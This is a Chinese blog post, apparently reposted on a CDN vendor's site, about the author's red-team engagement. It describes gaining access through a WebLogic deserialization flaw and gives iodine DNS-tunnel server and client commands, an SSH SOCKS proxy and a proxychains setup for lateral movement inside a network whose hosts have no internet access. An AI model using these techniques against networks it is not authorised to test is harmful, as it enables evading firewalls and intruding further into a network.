内网渗透之DNS隧道

前言

年初有幸参加了一次hvv,我主要负责内网渗透的部分,包括代理搭建,横向移动等等。那个时候,也是刚刚接触内网没两个月,赶鸭子上架的学了一下就上了战场。好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都在用reGeorgh和Pystinger,这两款工具都是使用webshell来进行socks代理,进而穿透内网,后面确实也达到目的,进内网水了波分。回学校复盘的时候,发现还有一种更厉害的姿势。。。搭建DNS隧道。

DNS隧道介绍

DNS隧道,是隧道技术中的一种。当我们的HTTP、HTTPS这样的上层协议、正反向端口转发都失败的时候,可以尝试使用DNS隧道。DNS隧道很难防范,因为平时的业务也好,使用也罢,难免会用到DNS协议进行解析,所以防火墙大多对DNS的流量是放行状态。这时候,如果我们在不出网机器构造一个恶意的域名(***.test.cn),本地的DNS服务器无法给出回答时,就会以迭代查询的方式通过互联网定位到所查询域的权威DNS服务器。最后,这条DNS请求会落到我们提前搭建好的恶意DNS服务器上,于是乎,我们的不出网主机就和恶意DNS服务器交流上了。

内网渗透之DNS隧道

DNS隧道搭建工具推荐

DNS隧道搭建的工具有很多,包括iodine,dns2tcp,dnscat等,综合体验了一下,还是推荐大家使用iodine,非常的简单方便。

前置准备

因为我们需要在自己的VPS上使用DNS服务,所以得先配置一下域名,这里以腾讯云为例:

内网渗透之DNS隧道

第一条A类记录,告诉域名系统,"dns.xxx.com"的IP地址是"175.xxx.xxx.xxx"

第二条NS记录,告诉域名系统,"dns2tcp.xxx.com"的域名由"dns.xxx.com"进行解析。

最后这条"dns2tcp.xxx.com"的DNS就会被"175.xxx.xxx.xxx"的主机(也就是我们的VPS),给解析掉。

配置完之后,可以ping一下dns.xxx.com,观察是否能ping通。

iodine进行隧道搭建

1.安装iodine,这里以Linux为例,如果是Windows系统,就下载安装对应版本的iodine即可。

apt-get install iodine

2.在VPS上运行iodine的服务端iodined,运行之后VPS上会多一个虚拟网卡地址:

内网渗透之DNS隧道

 iodined -f -c -P d1m0n 192.168.0.1 dns2tcp.xxx.com -DD  #-f:在前台运行 #-c:禁止检查所有传入请求的客户端IP地址。 #-P:客户端和服务端之间用于验证身份的密码。 #-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。 #这里的192.168.0.1为自定义局域网虚拟IP地址,建议不要与现有网段冲突 #注意!填写的地址为NS记录

3.运行客户端iodine,这里使用kali,kali默认是安装好iodine的:

内网渗透之DNS隧道

 iodine -f -P d1m0n dns2tcp.xxx.com -M 200 #-r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用DNS隧道 #-M:指定上行主机的大小。 #-m:调节最大下行分片的大小。 #-f:在前台运行 #-T:指定DNS请求类型TYPE,可选项有NULL、PRIVATE、TXT、SRV、CNAME、MX、A。 #-O:指定数据编码规范。 #-P:客户端和服务端之间用于验证身份的密码。 #-L:指定是否开启懒惰模式,默认开启。 #-I:指定两个请求之间的时间间隔。

两条命令,DNS隧道就已经搭好了,可以ping一下我们的VPS(ip:192.168.0.1)看一下,是否能通:

内网渗透之DNS隧道

到此,我们的任务只完成一半,对内网渗透来说,我们肯定是要横向移动的。DNS隧道帮助我们出网,还需要再搭建一个socks代理便于我们横向移动,socks代理工具很多,这里介绍一个比较简单轻便的–ssh,ssh通常都用来登录远程主机,传输的内容全部经过加密处理,同样它内置了命令可以作为代理服务器使用。这里假设,我们把恶意DNS服务器作为跳板机,kali作为攻击机器,在kali这边配置一下:

 ssh -N -D 8080 user@192.168.0.1 #-N 指示SSH不要启动shell,因为我们只是想创建代理 #-D 设置动态端口转发,SOCKS代理端口为8080 #user 我们服务器上的用户 #192.168.0.1 tun接口上的iodine服务器

内网渗透之DNS隧道

输入完VPS的ssh密码之后,就开始进行转发,这里配置一下proxychains4

vim /etc/proxychains4.conf

内网渗透之DNS隧道

最后验证一下我们的代理有没有搭好:

proxychains4 curl http://www.baidu.com

内网渗透之DNS隧道

大功告成,后面就是内网漫游时间~

实操推荐:DNS服务器配置(通过本课程详细学习了解DNS)

PC端体验地址:http://mrw.so/5YvGsF

原文链接:https://blog.csdn.net/YJ_12340/article/details/127668767?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169114665816800192258210%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=169114665816800192258210&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-27-127668767-null-null.268%5Ev1%5Ekoosearch&utm_term=dns%E9%98%B2%E6%8A%A4

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/20910

(0)
上一篇 2023年9月24日
下一篇 2023年9月25日

相关推荐

  • 10个国外常用的SEO优化工具

    工欲善其事,必利其器,卢松松曾经介绍过不少SEO优化工具,在工具性能上来说国内外的SEO优化工具总是有少许差别,尽管对于大部分网站优化工作还得靠人工去做,但SEO工具作为辅助工具,…

    网站百科 2023年11月13日
    00384
  • 网站安全检测之逻辑漏洞检测修复方案

    网站安全是整个网站运营中最重要的一部分,网站没有了安全,那用户的隐私如何保障,在网站中进行的任何交易,支付,用户的注册信息都就没有了安全保障,所以网站安全做好了,才能更好的去运营一…

    2023年6月8日
    00313
  • git 国内加速

    fastgit.orghttps://doc.fastgit.org/ gitclone.comhttps://gitclone.com/ giteehttps://gitee.c…

    网站百科 2023年9月22日
    00582
  • 什么是防火墙?如何防护CC攻击?

    随着互联网的不断发展,网络安全问题越来越受到人们的关注。在2018年全球风险报告中,网络安全问题排名前三,仅次于自然灾害与极端天气事件,这足以说明网络安全的重要性,而防火墙则是网络…

    2024年1月1日
    00298
  • 常见的网站安全问题有哪些?

    原标题:常见的网站安全问题有哪些? 网站对一个企业的重要性不言而喻,从企业网站的日益增多就很明显。其中一些通过网站获得了更多的客户。但更多的时候,并没有发挥出网站应有的作用。今天,…

    网站百科 2023年6月27日
    00365
  • DDoS防护系统建设的一些思路

    互联网和我们的工作、生活,已经结合得越来越紧密。互联网上承载了越来越多的重要业务,已经成为了关乎国计民生的关键基础设施。ddos攻击,是对互联网基础设施的重要威胁之一,甚至可能导致…

    网站百科 2024年4月3日
    00239
  • DDoS攻击防护

    双层防护,无缝切换 本地实时防护:部署在用户机房的百度安全私有云设备内置了强大的智能高敏识别层滤系统,可识别主要攻击特征,并及时启动防御,独创的源站保护模块可有效避免服务器被瞬间打…

    网站百科 2024年3月6日
    00206
  • [WEB安全]SSRF中URL的伪协议

    当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议 file:/// dict:// sftp:// ldap:// tftp:// gopher:// 这种U…

    网站百科 2023年9月27日
    00453
  • web服务器如何防护cc攻击

    cc攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。目前ddos攻击相对比较常见,因为ddos技术含量比较低,而cc攻击虽然不如d…

    2024年4月5日
    00210
  • SEO优化具体怎么做

    目前,互联网行业竞争激烈,想要在互联网行业立足并不是一件容易事情,尤其是对于一些中小型企业而言,没有很好地利用互联网进行优化发展。在这个过程中, SEO优化一直是一个被广泛关注的话…

    2023年8月10日
    00462

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml